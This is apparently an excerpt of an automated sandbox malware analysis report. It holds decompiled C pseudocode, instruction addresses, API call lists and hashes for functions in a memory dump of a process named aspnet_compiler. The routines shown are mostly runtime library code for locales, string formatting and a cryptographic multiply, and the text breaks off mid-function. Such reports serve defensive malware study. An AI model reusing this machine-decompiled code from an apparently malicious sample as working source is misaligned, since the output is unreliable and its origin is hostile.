                0x00432767
                0x0043276e
                0x00432773
                0x00432782
                0x00432794
                0x004327a2
                0x004327a6
                0x004327a8
                0x004327a9
                0x004327ad
                0x004327b1
                0x004327be
                0x004327bf
                0x004327e9
                0x004327ef
                0x004327f3
                0x004327f6
                0x004327ff
                0x00432803
                0x00432807
                0x00432807
                0x00432817
                0x00432817
                0x0043281b
                0x0043281f
                0x00432823
                0x00432827
                0x0043282a
                0x0043282a
                0x0043283b

                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: 0
                • API String ID: 0-4108050209
                • Opcode ID: 8b4612748608aeb2008bc8a0af576cbc32ea407e6710a776a8c7822d91d7aa14
                • Instruction ID: 59f9b37ce2e7c59d09aa74df1e0cfde51b0cda787351805797fb9724513e9a1f
                • Opcode Fuzzy Hash: 8b4612748608aeb2008bc8a0af576cbc32ea407e6710a776a8c7822d91d7aa14
                • Instruction Fuzzy Hash: EA127137B083519BD704DF65CA81A1EB3E2BFCC718F15492EF585A7381DA74E8068B86
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00450B93 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                Download Yara Rule
                C-Code - Quality: 59%
                			E00450B93(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				void* __ebp;
				signed int _t16;
				signed int _t22;
				void* _t24;
				void* _t31;
				void* _t35;
				signed int* _t50;
				int _t53;
				signed int _t54;

				_t16 =  *0x46f00c; // 0xd60a1515
				_v8 = _t16 ^ _t54;
				_t35 = E00446A95(__ebx, __ecx, __edx);
				_t50 =  *(E00446A95(_t35, __ecx, __edx) + 0x34c);
				_t53 = E00450C6B(_a4);
				asm("sbb ecx, ecx");
				_t22 = GetLocaleInfoW(_t53, ( ~( *(_t35 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
				if(_t22 != 0) {
					_t24 = E00452294(_t35, _t50, _t53,  *((intOrPtr*)(_t35 + 0x50)),  &_v248);
					if(_t24 != 0) {
						if( *(_t35 + 0x60) == 0 &&  *((intOrPtr*)(_t35 + 0x5c)) != 0) {
							_t31 = E00452294(_t35, _t50, _t53,  *((intOrPtr*)(_t35 + 0x50)),  &_v248);
							if(_t31 == 0) {
								_push(_t50);
								_push(_t31);
								goto L9;
							}
						}
					} else {
						if( *(_t35 + 0x60) != _t24) {
							L10:
							 *_t50 =  *_t50 | 0x00000004;
							_t50[1] = _t53;
							_t50[2] = _t53;
						} else {
							_push(_t50);
							_push(1);
							L9:
							_push(_t53);
							if(E00450DC3(_t35) != 0) {
								goto L10;
							}
						}
					}
				} else {
					 *_t50 =  *_t50 & _t22;
				}
				return E004338BB(_v8 ^ _t54);
			}














                0x00450b9e
                0x00450ba5
                0x00450bb3
                0x00450bbb
                0x00450bca
                0x00450bd6
                0x00450be7
                0x00450bef
                0x00450c00
                0x00450c09
                0x00450c19
                0x00450c2b
                0x00450c34
                0x00450c36
                0x00450c37
                0x00000000
                0x00450c37
                0x00450c34
                0x00450c0b
                0x00450c0e
                0x00450c45
                0x00450c45
                0x00450c48
                0x00450c4b
                0x00450c10
                0x00450c10
                0x00450c11
                0x00450c38
                0x00450c38
                0x00450c43
                0x00000000
                0x00000000
                0x00450c43
                0x00450c0e
                0x00450bf1
                0x00450bf1
                0x00450bf3
                0x00450c68

                APIs
                  • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                  • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                  • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                  • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                  • Part of subcall function 00446A95: _free.LIBCMT ref: 00446AF4
                  • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B01
                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450BE7
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$_free$InfoLocale_abort
                • String ID:
                • API String ID: 1663032902-0
                • Opcode ID: 4597e0029ea091ecb2ebf5e98482b9f6fcb85861c7a3cfe2c1e922654fb1815e
                • Instruction ID: d6adf83c33703ae5228b67ec7a49f9fec95c79c937f4ddcaaa5f3f490f6395be
                • Opcode Fuzzy Hash: 4597e0029ea091ecb2ebf5e98482b9f6fcb85861c7a3cfe2c1e922654fb1815e
                • Instruction Fuzzy Hash: DB21D6365002069BDB2D9F25DC42A7773ACEB06316F1001BBFD05D6242EB78ED88CB59
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00450DC3 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                Download Yara Rule
                C-Code - Quality: 93%
                			E00450DC3(void* __ebx, signed int _a4, intOrPtr _a8) {
				short _v8;
				void* __ecx;
				void* __ebp;
				void* _t8;
				void* _t12;
				intOrPtr _t13;
				void* _t16;
				void* _t20;
				void* _t22;
				void* _t24;
				signed int _t27;
				intOrPtr* _t29;

				_push(_t16);
				_t8 = E00446A95(__ebx, _t16, _t22);
				_t27 = _a4;
				_t24 = _t8;
				if(GetLocaleInfoW(_t27 & 0x000003ff | 0x00000400, 0x20000001,  &_v8, 2) != 0) {
					if(_t27 == _v8 || _a8 == 0) {
						L7:
						_t12 = 1;
					} else {
						_t29 =  *((intOrPtr*)(_t24 + 0x50));
						_t20 = _t29 + 2;
						do {
							_t13 =  *_t29;
							_t29 = _t29 + 2;
						} while (_t13 != 0);
						if(E00450917( *((intOrPtr*)(_t24 + 0x50))) == _t29 - _t20 >> 1) {
							goto L1;
						} else {
							goto L7;
						}
					}
				} else {
					L1:
					_t12 = 0;
				}
				return _t12;
			}















                0x00450dc8
                0x00450dcb
                0x00450dd0
                0x00450dd3
                0x00450df7
                0x00450e00
                0x00450e2a
                0x00450e2c
                0x00450e08
                0x00450e08
                0x00450e0b
                0x00450e0e
                0x00450e0e
                0x00450e11
                0x00450e14
                0x00450e28
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00450e28
                0x00450df9
                0x00450df9
                0x00450df9
                0x00450df9
                0x00450e32

                APIs
                  • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                  • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                  • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                  • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00450B61,00000000,00000000,?), ref: 00450DEF
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$InfoLocale_abort_free
                • String ID:
                • API String ID: 2692324296-0
                • Opcode ID: 10618e774f34a6619048d0637102a68081d551e0a0db41e4c1e10200fba24050
                • Instruction ID: 265ab6a49acb69b6371535c2f9c40041978aee9ae2e746c74d294b287eb083f8
                • Opcode Fuzzy Hash: 10618e774f34a6619048d0637102a68081d551e0a0db41e4c1e10200fba24050
                • Instruction Fuzzy Hash: 41F0493AA40117ABDB245A64C8077BB7B68EB00315F148C6AEC05A3241EA38FD0986D4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00446C84 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 80%
                			E00446C84(void* __eflags) {
				int _t15;
				void* _t28;

				E00433700(0x46ca10, 0xc);
				 *(_t28 - 0x1c) =  *(_t28 - 0x1c) & 0x00000000;
				E00444189( *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)))));
				 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
				 *0x470738 = E004425DA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t28 + 0xc)))))));
				_t15 = EnumSystemLocalesW(E00446C3E, 1);
				_push(0x20);
				asm("ror eax, cl");
				 *0x470738 = 0 ^  *0x46f00c;
				 *(_t28 - 0x1c) = _t15;
				 *(_t28 - 4) = 0xfffffffe;
				E00446CFC();
				return E00433746();
			}





                0x00446c8b
                0x00446c90
                0x00446c99
                0x00446c9f
                0x00446cb0
                0x00446cbc
                0x00446ccc
                0x00446cd3
                0x00446cdb
                0x00446ce0
                0x00446ce3
                0x00446cea
                0x00446cf6

                APIs
                  • Part of subcall function 00444189: EnterCriticalSection.KERNEL32(-0006B43D,?,004418AB,00000000,0046C868,0000000C,00441866,?,?,?,00444427,?,?,00446B4A,00000001,00000364), ref: 00444198
                • EnumSystemLocalesW.KERNEL32(00446C3E,00000001,0046CA10,0000000C), ref: 00446CBC
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CriticalEnterEnumLocalesSectionSystem
                • String ID:
                • API String ID: 1272433827-0
                • Opcode ID: aa06587be2c9cb8b071f33295b8cbec66515d87765e7fc573258893074f482cb
                • Instruction ID: 8a714871f2e0af15b08c3d487532fbc1d9fceb156b6070508e72b175ec7fb5e6
                • Opcode Fuzzy Hash: aa06587be2c9cb8b071f33295b8cbec66515d87765e7fc573258893074f482cb
                • Instruction Fuzzy Hash: F4F04F72610204EFE714EF68E886B5D77E0EB05725F10813BF844DB2E2DB799A808F59
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004507D0 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 100%
                			E004507D0(void* __ecx, void* __edx, signed char* _a4) {
				void* __ebp;
				intOrPtr _t9;
				signed char* _t13;
				void* _t14;
				intOrPtr* _t16;
				void* _t20;
				void* _t22;

				_t20 = E00446A95(_t14, __ecx, __edx);
				_t16 =  *((intOrPtr*)(_t20 + 0x54));
				_t22 = _t16 + 2;
				do {
					_t9 =  *_t16;
					_t16 = _t16 + 2;
				} while (_t9 != 0);
				 *(_t20 + 0x64) = 0 | _t16 - _t22 >> 0x00000001 == 0x00000003;
				EnumSystemLocalesW(0x450727, 1);
				_t13 = _a4;
				if(( *_t13 & 0x00000004) == 0) {
					 *_t13 = 0;
					return _t13;
				}
				return _t13;
			}










                0x004507dc
                0x004507e0
                0x004507e3
                0x004507e6
                0x004507e6
                0x004507e9
                0x004507ec
                0x00450804
                0x00450807
                0x0045080d
                0x00450813
                0x00450815
                0x00000000
                0x00450815
                0x0045081a

                APIs
                  • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                  • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                  • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                  • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                • EnumSystemLocalesW.KERNEL32(00450727,00000001,?,?,?,00450F92,m3D,?,?,?,?,?,0044336D,?,?,?), ref: 00450807
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                • String ID:
                • API String ID: 1084509184-0
                • Opcode ID: 9174a0c065a7b49ba50cb90ab7ddfc1d90f3254fc2b27fe64f266881c7e4a03e
                • Instruction ID: 6cc6cd71b12713b10ec057b6d25e2a24f4d08592f735aee3b5647b3ea735c769
                • Opcode Fuzzy Hash: 9174a0c065a7b49ba50cb90ab7ddfc1d90f3254fc2b27fe64f266881c7e4a03e
                • Instruction Fuzzy Hash: 6DF05C3930024597CB049F35DC05A6BBF50EFC2755B06805EEE058B641C635AC46CB54
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040EE14 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                Download Yara Rule
                C-Code - Quality: 75%
                			E0040EE14(void* __ecx) {
				char _v8;
				void* __ebp;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t15;

				_push(__ecx);
				_t13 = __ecx;
				GetLocaleInfoA(0x800, 0x5a,  &_v8, 3);
				E00402073(_t8, _t13, _t11, _t15,  &_v8);
				return _t13;
			}









                0x0040ee17
                0x0040ee1e
                0x0040ee28
                0x0040ee34
                0x0040ee3f

                APIs
                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00414839,00472EC8,00473950,00472EC8,00000000,00472EC8,00000000,00472EC8,4.6.0 Pro), ref: 0040EE28
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: InfoLocale
                • String ID:
                • API String ID: 2299586839-0
                • Opcode ID: 89d85122d4b319954b498ca729ef7b6588c5c2e3b4f1b669d3eb966a2cd12403
                • Instruction ID: f278ed4507f78d565aa92993a3921e54a570b3fb05803534b7f05061c5bfe0db
                • Opcode Fuzzy Hash: 89d85122d4b319954b498ca729ef7b6588c5c2e3b4f1b669d3eb966a2cd12403
                • Instruction Fuzzy Hash: C0D05B30B4421C77E51096859C0AFAB7B9CD701B52F0001A6BA04D72C0D9E15E0087D5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0043CBCB Relevance: 1.5, Strings: 1, Instructions: 237COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 83%
                			E0043CBCB(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _t52;
				signed int _t54;
				signed int _t55;
				void* _t56;
				signed char _t60;
				signed char _t62;
				signed int _t64;
				void* _t65;
				signed int _t66;
				signed char _t75;
				signed char _t78;
				void* _t86;
				void* _t88;
				signed char _t90;
				signed char _t92;
				signed int _t93;
				signed int _t96;
				signed int _t98;
				signed int _t99;
				signed int _t103;
				signed int* _t104;
				void* _t106;
				signed int _t112;
				unsigned int _t114;
				signed char _t116;
				void* _t124;
				unsigned int _t125;
				void* _t126;
				signed int _t127;
				short _t128;
				void* _t131;
				void* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;
				void* _t139;
				void* _t140;

				_t126 = __edi;
				_t52 =  *0x46f00c; // 0xd60a1515
				_v8 = _t52 ^ _t136;
				_t135 = __ecx;
				_t103 = 0;
				_t124 = 0x41;
				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
				_t106 = 0x58;
				_t139 = _t54 - 0x64;
				if(_t139 > 0) {
					__eflags = _t54 - 0x70;
					if(__eflags > 0) {
						_t55 = _t54 - 0x73;
						__eflags = _t55;
						if(_t55 == 0) {
							L9:
							_t56 = E0043D85A(_t135);
							L10:
							if(_t56 != 0) {
								__eflags =  *((intOrPtr*)(_t135 + 0x30)) - _t103;
								if( *((intOrPtr*)(_t135 + 0x30)) != _t103) {
									L71:
									L72:
									return E004338BB(_v8 ^ _t136);
								}
								_t125 =  *(_t135 + 0x20);
								_push(_t126);
								_v16 = _t103;
								_t60 = _t125 >> 4;
								_v12 = _t103;
								_t127 = 0x20;
								__eflags = 1 & _t60;
								if((1 & _t60) == 0) {
									L46:
									_t112 =  *(_t135 + 0x32) & 0x0000ffff;
									__eflags = _t112 - 0x78;
									if(_t112 == 0x78) {
										L48:
										_t62 = _t125 >> 5;
										__eflags = _t62 & 0x00000001;
										if((_t62 & 0x00000001) == 0) {
											L50:
											__eflags = 0;
											L51:
											__eflags = _t112 - 0x61;
											if(_t112 == 0x61) {
												L54:
												_t64 = 1;
												L55:
												_t128 = 0x30;
												__eflags = _t64;
												if(_t64 != 0) {
													L57:
													_t65 = 0x58;
													 *((short*)(_t136 + _t103 * 2 - 0xc)) = _t128;
													__eflags = _t112 - _t65;
													if(_t112 == _t65) {
														L60:
														_t66 = 1;
														L61:
														__eflags = _t66;
														asm("cbw");
														 *((short*)(_t136 + _t103 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
														_t103 = _t103 + 2;
														__eflags = _t103;
														L62:
														_t131 =  *((intOrPtr*)(_t135 + 0x24)) -  *((intOrPtr*)(_t135 + 0x38)) - _t103;
														__eflags = _t125 & 0x0000000c;
														if((_t125 & 0x0000000c) == 0) {
															E0043B3AD(_t135 + 0x448, 0x20, _t131, _t135 + 0x18);
															_t137 = _t137 + 0x10;
														}
														E0043DDC5(_t135 + 0x448,  &_v16, _t103, _t135 + 0x18,  *((intOrPtr*)(_t135 + 0xc)));
														_t114 =  *(_t135 + 0x20);
														_t104 = _t135 + 0x18;
														_t75 = _t114 >> 3;
														__eflags = _t75 & 0x00000001;
														if((_t75 & 0x00000001) != 0) {
															_t116 = _t114 >> 2;
															__eflags = _t116 & 0x00000001;
															if((_t116 & 0x00000001) == 0) {
																E0043B3AD(_t135 + 0x448, 0x30, _t131, _t104);
																_t137 = _t137 + 0x10;
															}
														}
														E0043DC25(_t135, _t125, 0);
														__eflags =  *_t104;
														if( *_t104 >= 0) {
															_t78 =  *(_t135 + 0x20) >> 2;
															__eflags = _t78 & 0x00000001;
															if((_t78 & 0x00000001) != 0) {
																E0043B3AD(_t135 + 0x448, 0x20, _t131, _t104);
															}
														}
														goto L71;
													}
													_t86 = 0x41;
													__eflags = _t112 - _t86;
													if(_t112 == _t86) {
														goto L60;
													}
													_t66 = 0;
													goto L61;
												}
												__eflags = _t64;
												if(_t64 == 0) {
													goto L62;
												}
												goto L57;
											}
											_t133 = 0x41;
											__eflags = _t112 - _t133;
											if(_t112 == _t133) {
												goto L54;
											}
											_t64 = 0;
											goto L55;
										}
										goto L51;
									}
									_t88 = 0x58;
									__eflags = _t112 - _t88;
									if(_t112 != _t88) {
										goto L50;
									}
									goto L48;
								}
								_t90 = _t125 >> 6;
								__eflags = 1 & _t90;
								if((1 & _t90) == 0) {
									__eflags = 1 & _t125;
									if((1 & _t125) == 0) {
										_t92 = _t125 >> 1;
										__eflags = 1 & _t92;
										if((1 & _t92) == 0) {
											goto L46;
										}
										_v16 = _t127;
										L45:
										_t103 = 1;
										goto L46;
									}
									_push(0x2b);
									L40:
									_pop(_t93);
									_v16 = _t93;
									goto L45;
								}
								_push(0x2d);
								goto L40;
							}
							L11:
							goto L72;
						}
						_t96 = _t55;
						__eflags = _t96;
						if(__eflags == 0) {
							L28:
							_push(_t103);
							_push(0xa);
							L29:
							_t56 = E0043D5F2(_t135, _t126, __eflags);
							goto L10;
						}
						__eflags = _t96 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t56 = E0043D7CF(__ecx);
						goto L10;
					}
					__eflags = _t54 - 0x67;
					if(_t54 <= 0x67) {
						L30:
						_t56 = E0043D358(_t103, _t135);
						goto L10;
					}
					__eflags = _t54 - 0x69;
					if(_t54 == 0x69) {
						L27:
						_t3 = _t135 + 0x20;
						 *_t3 =  *(_t135 + 0x20) | 0x00000010;
						__eflags =  *_t3;
						goto L28;
					}
					__eflags = _t54 - 0x6e;
					if(_t54 == 0x6e) {
						_t56 = E0043D73C(__ecx, _t124);
						goto L10;
					}
					__eflags = _t54 - 0x6f;
					if(_t54 != 0x6f) {
						goto L11;
					}
					_t56 = E0043D7B0(__ecx);
					goto L10;
				}
				if(_t139 == 0) {
					goto L27;
				}
				_t140 = _t54 - _t106;
				if(_t140 > 0) {
					_t98 = _t54 - 0x5a;
					__eflags = _t98;
					if(_t98 == 0) {
						_t56 = E0043D19B(__ecx);
						goto L10;
					}
					_t99 = _t98 - 7;
					__eflags = _t99;
					if(_t99 == 0) {
						goto L30;
					}
					__eflags = _t99;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t56 = E0043D55A(_t135, __eflags, _t103);
					goto L10;
				}
				if(_t140 == 0) {
					_push(1);
					goto L13;
				}
				if(_t54 == _t124) {
					goto L30;
				}
				if(_t54 == 0x43) {
					goto L17;
				}
				if(_t54 <= 0x44) {
					goto L11;
				}
				if(_t54 <= 0x47) {
					goto L30;
				}
				if(_t54 != 0x53) {
					goto L11;
				}
				goto L9;
			}











































                0x0043cbcb
                0x0043cbd3
                0x0043cbda
                0x0043cbdf
                0x0043cbe1
                0x0043cbe5
                0x0043cbe8
                0x0043cbec
                0x0043cbed
                0x0043cbf0
                0x0043cc5d
                0x0043cc60
                0x0043ccaf
                0x0043ccaf
                0x0043ccb2
                0x0043cc1e
                0x0043cc20
                0x0043cc25
                0x0043cc27
                0x0043cccd
                0x0043ccd0
                0x0043ce16
                0x0043ce18
                0x0043ce27
                0x0043ce27
                0x0043ccd6
                0x0043ccdb
                0x0043ccde
                0x0043cce1
                0x0043cce5
                0x0043cceb
                0x0043ccec
                0x0043ccee
                0x0043cd18
                0x0043cd18
                0x0043cd1c
                0x0043cd1f
                0x0043cd29
                0x0043cd2b
                0x0043cd2e
                0x0043cd30
                0x0043cd36
                0x0043cd36
                0x0043cd38
                0x0043cd38
                0x0043cd3b
                0x0043cd49
                0x0043cd49
                0x0043cd4b
                0x0043cd4d
                0x0043cd4e
                0x0043cd50
                0x0043cd56
                0x0043cd58
                0x0043cd59
                0x0043cd5e
                0x0043cd61
                0x0043cd6f
                0x0043cd6f
                0x0043cd71
                0x0043cd71
                0x0043cd7c
                0x0043cd7e
                0x0043cd83
                0x0043cd83
                0x0043cd86
                0x0043cd8c
                0x0043cd8e
                0x0043cd91
                0x0043cda1
                0x0043cda6
                0x0043cda6
                0x0043cdbb
                0x0043cdc0
                0x0043cdc3
                0x0043cdc8
                0x0043cdcb
                0x0043cdcd
                0x0043cdcf
                0x0043cdd2
                0x0043cdd5
                0x0043cde2
                0x0043cde7
                0x0043cde7
                0x0043cdd5
                0x0043cdee
                0x0043cdf3
                0x0043cdf6
                0x0043cdfb
                0x0043cdfe
                0x0043ce00
                0x0043ce0d
                0x0043ce12
                0x0043ce00
                0x00000000
                0x0043ce15
                0x0043cd65
                0x0043cd66
                0x0043cd69
                0x00000000
                0x00000000
                0x0043cd6b
                0x00000000
                0x0043cd6b
                0x0043cd52
                0x0043cd54
                0x00000000
                0x00000000
                0x00000000
                0x0043cd54
                0x0043cd3f
                0x0043cd40
                0x0043cd43
                0x00000000
                0x00000000
                0x0043cd45
                0x00000000
                0x0043cd45
                0x00000000
                0x0043cd32
                0x0043cd23
                0x0043cd24
                0x0043cd27
                0x00000000
                0x00000000
                0x00000000
                0x0043cd27
                0x0043ccf2
                0x0043ccf5
                0x0043ccf7
                0x0043cd02
                0x0043cd04
                0x0043cd0c
                0x0043cd0e
                0x0043cd10
                0x00000000
                0x00000000
                0x0043cd12
                0x0043cd16
                0x0043cd16
                0x00000000
                0x0043cd16
                0x0043cd06
                0x0043ccfb
                0x0043ccfb
                0x0043ccfc
                0x00000000
                0x0043ccfc
                0x0043ccf9
                0x00000000
                0x0043ccf9
                0x0043cc2d
                0x00000000
                0x0043cc2d
                0x0043ccb9
                0x0043ccb9
                0x0043ccbc
                0x0043cc8e
                0x0043cc8e
                0x0043cc8f
                0x0043cc91
                0x0043cc93
                0x00000000
                0x0043cc93
                0x0043ccbe
                0x0043ccc1
                0x00000000
                0x00000000
                0x0043ccc7
                0x0043cc36
                0x0043cc36
                0x00000000
                0x0043cc36
                0x0043cc62
                0x0043cca5
                0x00000000
                0x0043cca5
                0x0043cc64
                0x0043cc67
                0x0043cc9a
                0x0043cc9c
                0x00000000
                0x0043cc9c
                0x0043cc69
                0x0043cc6c
                0x0043cc8a
                0x0043cc8a
                0x0043cc8a
                0x0043cc8a
                0x00000000
                0x0043cc8a
                0x0043cc6e
                0x0043cc71
                0x0043cc83
                0x00000000
                0x0043cc83
                0x0043cc73
                0x0043cc76
                0x00000000
                0x00000000
                0x0043cc7a
                0x00000000
                0x0043cc7a
                0x0043cbf2
                0x00000000
                0x00000000
                0x0043cbf8
                0x0043cbfa
                0x0043cc3a
                0x0043cc3a
                0x0043cc3d
                0x0043cc56
                0x00000000
                0x0043cc56
                0x0043cc3f
                0x0043cc3f
                0x0043cc42
                0x00000000
                0x00000000
                0x0043cc45
                0x0043cc48
                0x00000000
                0x00000000
                0x0043cc4a
                0x0043cc4d
                0x00000000
                0x0043cc4d
                0x0043cbfc
                0x0043cc34
                0x00000000
                0x0043cc34
                0x0043cc00
                0x00000000
                0x00000000
                0x0043cc09
                0x00000000
                0x00000000
                0x0043cc0e
                0x00000000
                0x00000000
                0x0043cc13
                0x00000000
                0x00000000
                0x0043cc1c
                0x00000000
                0x00000000
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: 2GBm@
                • API String ID: 0-3202163235
                • Opcode ID: 92687441cf7bbf9bb57ec18a7d9bb2a25548ff4fb32270e1592d7c31f0a6f1be
                • Instruction ID: f11af76f1cab487b4a55bbceaf060dfc582bc565394e8b3492e4159fd7b4cc40
                • Opcode Fuzzy Hash: 92687441cf7bbf9bb57ec18a7d9bb2a25548ff4fb32270e1592d7c31f0a6f1be
                • Instruction Fuzzy Hash: 5961577160070856DE385A2898D6BBF2394EB0D704F24382FF94BFB381D61D9D42875E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00426351 Relevance: 1.4, Strings: 1, Instructions: 109COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 87%
                			E00426351(signed int* __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int* _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _t76;
				signed int _t77;
				signed int _t81;
				signed int _t85;
				signed int _t88;
				signed int _t92;
				unsigned int _t93;
				signed int _t98;
				signed int* _t99;
				signed int _t101;
				signed int _t102;
				signed int _t103;
				signed int _t109;
				signed int _t115;
				signed int _t116;
				signed int _t118;
				signed int _t120;
				signed int _t124;

				_t93 = __ecx[1];
				asm("xorps xmm0, xmm0");
				_t120 =  *__ecx;
				_t76 = 0;
				_t115 = __ecx[2];
				asm("movlpd [esp+0x40], xmm0");
				asm("movlpd [esp+0x38], xmm0");
				_v48 = _v12;
				_v40 = __edx;
				_t101 = __ecx[3];
				_v24 = __ecx;
				_v52 = _v16;
				_v28 = 0;
				_v44 = _v8;
				_v56 = _v20;
				do {
					_v32 = 0x40;
					_t109 =  *(_v40 + _t76 * 8);
					_t77 =  *(_v40 + 4 + _t76 * 8);
					_t98 = _v44;
					_v36 = _t77;
					do {
						_t124 = _t77;
						if(_t124 <= 0 && (_t124 < 0 || _t109 < 0)) {
							_v56 = _v56 ^ _t120;
							_v52 = _v52 ^ _t93;
							_v48 = _v48 ^ _t115;
							_t98 = _t98 ^ _t101;
						}
						_t81 = _t120;
						if((_t115 & 0x00000001) == 0) {
							_t116 = (_t101 << 0x00000020 | _t115) >> 1;
							_t102 = _t101 >> 1;
							if((_t81 & 0x00000001) == 0) {
								asm("xorps xmm0, xmm0");
								asm("movlpd [esp+0x38], xmm0");
								_v44 = _v16;
								_t85 = _v20;
							} else {
								_t85 = 0;
								_v44 = 0x80000000;
							}
							_t101 = _t102 | _v44;
							_t115 = _t116 | _t85;
							_t120 = (_t93 << 0x00000020 | _t120) >> 1;
							_t93 = _t93 >> 1;
						} else {
							_t118 = (_t101 << 0x00000020 | _t115) >> 1;
							_t103 = _t101 >> 1;
							if((_t81 & 0x00000001) == 0) {
								asm("xorps xmm0, xmm0");
								asm("movlpd [esp+0x38], xmm0");
								_v44 = _v16;
								_t92 = _v20;
							} else {
								_t92 = 0;
								_v44 = 0x80000000;
							}
							_t101 = _t103 | _v44;
							_t115 = _t118 | _t92;
							_t120 = (_t93 << 0x00000020 | _t120) >> 0x1 ^ 0x00000000;
							_t93 = _t93 >> 0x00000001 ^ 0xe1000000;
						}
						_t77 = (_v36 << 0x00000020 | _t109) << 1;
						_t109 = _t109 + _t109;
						_v36 = _t77;
						_t63 =  &_v32;
